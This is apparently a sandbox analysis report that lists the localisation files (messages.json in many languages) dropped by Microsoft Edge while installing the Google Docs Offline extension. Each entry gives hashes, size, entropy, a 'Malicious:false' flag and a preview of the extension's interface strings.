                                                                                                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
